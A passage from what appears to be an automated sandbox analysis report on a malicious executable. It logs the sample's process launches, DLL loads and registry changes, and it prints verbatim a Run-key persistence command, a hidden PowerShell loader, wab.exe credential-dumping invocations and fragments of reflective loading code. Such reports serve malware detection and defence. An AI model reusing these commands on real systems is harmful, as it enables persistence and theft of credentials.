              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc"
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"Jump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: fontext.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: fms.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile written: C:\Users\user\Documents\Illoyalitet.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Evgh. rvs Armenia. 30.04.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2983515587.00000000088BA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2983515587.00000000088BA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2977567691.0000000007770000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: TA.pdb source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2977567691.0000000007770000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbl source: powershell.exe, 00000002.00000002.2983515587.00000000088D2000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.2984184609.0000000009CB6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ven $Modehandlernessterospondylic $Obcompressed), (Afformative @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Advokaturen110 = [AppDomain]::CurrentDomain.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bagbunden45)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Figener, $false).DefineType($Vrgelsheds, $Sam
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049E1100 push eax; ret 2_2_049E113A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049E1150 push eax; ret 2_2_049E115A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049E1140 push eax; ret 2_2_049E114A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049E1160 push eax; ret 2_2_049E116A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049E1C43 pushad ; iretd 2_2_049E1C49
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662806 push ecx; ret 7_2_23662819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
